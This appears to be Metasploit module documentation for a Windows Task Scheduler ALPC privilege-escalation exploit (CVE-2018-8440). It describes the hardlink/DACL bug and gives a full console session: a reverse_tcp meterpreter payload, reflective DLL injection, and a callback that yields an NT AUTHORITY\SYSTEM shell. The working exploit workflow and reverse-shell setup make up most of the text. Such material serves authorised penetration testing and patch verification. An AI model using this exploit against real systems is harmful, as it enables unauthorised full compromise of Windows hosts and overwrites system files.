Description
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to .job files located in c:\windows\tasks because the scheduler does not use impersonation when checking this location. Since users can create files in the c:\windows\tasks folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file.
WARNING: The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host will be overwritten when the exploit runs.
This module has been tested against Windows 10 Pro x64.
Vulnerable Application
Affected Windows OS versions and related patch details can be found in the Microsoft Advisory for CVE-2018-8440.
Verification Steps
Scenarios
Tested on Windows 10 Pro Version 1803 x64
msf5 > use exploit/windows/local/alpc_taskscheduler
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136
lhost => 172.22.222.136
msf5 exploit(windows/local/alpc_taskscheduler) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al... 172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
2 meterpreter x64/windows DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR 172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)
msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
session => 1
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
session => 2
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Checking target...
[*] Target looks good... attempting the LPE exploit
[+] Process 6140 launched.
[*] Writing payload dll into process 6140 memory
[*] Reflectively injecting the exploit DLL into 6140...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
session => 3
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Checking target...
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >
